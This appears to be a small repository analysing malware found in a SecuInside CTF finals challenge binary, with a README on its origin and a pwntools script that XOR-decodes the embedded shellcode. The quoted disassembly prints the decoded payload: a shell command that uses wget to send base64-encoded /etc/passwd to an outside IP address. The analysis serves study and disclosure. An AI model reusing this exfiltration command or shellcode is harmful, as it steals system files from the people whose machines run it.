README.md

secuinside challenge malware

Just a small present which was in one of the SecuInside Finals challenge binaries. The source appears to be that a South Korean government mail server was hacked, and challenge binaries being sent by the organizers went over it, and were thus infected themselves.

It doesn't look like it was active or invoked from anywhere, but then I didn't look too hard either. All it does is grabs /etc/passwd and shuttles it off to some AWS node.

There's a really cool story behind this incident, involving the South Korean government arresting CTF players, which you can hear about here: https://www.youtube.com/watch?v=Jnh8PK9iQco

decode.py

from pwn import * # https://pwntools.com to install

e = ELF('notes_19cd983d58eef2e5c7881ae8407e76d6')

### Decoder loop, which is never referenced
"""
.data:0804C0A0 ; ---------------------------------------------------------------------------
.data:0804C0A0                 mov     eax, 2
.data:0804C0A5                 int     80h             ; LINUX - sys_fork
.data:0804C0A7                 test    eax, eax
.data:0804C0A9                 jz      short loc_804C0B2
.data:0804C0AB                 mov     eax, 41414141h
.data:0804C0B0                 jmp     eax
.data:0804C0B2 ; ---------------------------------------------------------------------------
.data:0804C0B2
.data:0804C0B2 loc_804C0B2:                            ; CODE XREF: .data:0804C0A9j
.data:0804C0B2                 cld
.data:0804C0B3                 mov     ebx, 5363FD0h   ; xor key
.data:0804C0B8                 jmp     short call_decode_loop
.data:0804C0BA
.data:0804C0BA ; =============== S U B R O U T I N E =======================================
.data:0804C0BA
.data:0804C0BA
.data:0804C0BA decode_loop     proc near               ; CODE XREF: .data:call_decode_loopp
.data:0804C0BA                 pop     esi
.data:0804C0BB                 push    esi
.data:0804C0BC
.data:0804C0BC loop:                                   ; CODE XREF: decode_loop+9j
.data:0804C0BC                 xor     [esi], ebx
.data:0804C0BE                 lodsd
.data:0804C0BF                 add     ebx, eax
.data:0804C0C1                 test    eax, eax
.data:0804C0C3                 jnz     short loop
.data:0804C0C5                 retn
.data:0804C0C5 decode_loop     endp
.data:0804C0C5
.data:0804C0C6 ; ---------------------------------------------------------------------------
.data:0804C0C6
.data:0804C0C6 call_decode_loop:                       ; CODE XREF: .data:0804C0B8j
.data:0804C0C6                 call    decode_loop
.data:0804C0C6 ; ---------------------------------------------------------------------------
.data:0804C0CB                 dd 9C6E34BAh
"""
decoder = 0x0804C0A0
encoded = 0x0804C0CB
ebx     = 0x5363FD0
data    = []

while True:
  dword = unpack(e.read(encoded, 4))
  dword ^= ebx
  data.append(dword)

  eax = dword
  ebx = (ebx + eax) & 0xffffffff

  if dword == 0:
    break

  encoded += 4

payload = ''.join(map(pack, data))
print hexdump(payload)
write('payload', payload)

### The dumped payload looks something like
"""
seg000:00000000 seg000          segment byte public 'CODE' use32
seg000:00000000                 assume cs:seg000
seg000:00000000                 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:00000000                 push    0Bh             ; sys_execve
seg000:00000002                 pop     eax
seg000:00000003                 cdq
seg000:00000004                 push    edx
seg000:00000005                 push    small 632Dh
seg000:00000009                 mov     edi, esp
seg000:0000000B                 push    'hs/'
seg000:00000010                 push    'nib/'
seg000:00000015                 mov     ebx, esp
seg000:00000017                 push    edx
seg000:00000018                 call    loc_C4
seg000:00000018 ; ---------------------------------------------------------------------------
seg000:0000001D aWgetHttp54_178 db 'wget http://54.178.137.178/9isnxkqmz.php --post-data "`cat /etc/p'
seg000:0000001D                 db 'asswd | base64 | tr -d "\n"`" --header="Content-Type: text/plain"'
seg000:0000001D                 db ' -O /dev/null >/dev/null 2>/dev/null',0
seg000:000000C4 ; ---------------------------------------------------------------------------
seg000:000000C4
seg000:000000C4 loc_C4:                                 ; CODE XREF: seg000:00000018p
seg000:000000C4                 push    edi
seg000:000000C5                 push    ebx
seg000:000000C6                 mov     ecx, esp
seg000:000000C8                 int     80h             ; LINUX -
seg000:000000C8 ; ---------------------------------------------------------------------------
"""

notes_19cd983d58eef2e5c7881ae8407e76d6

payload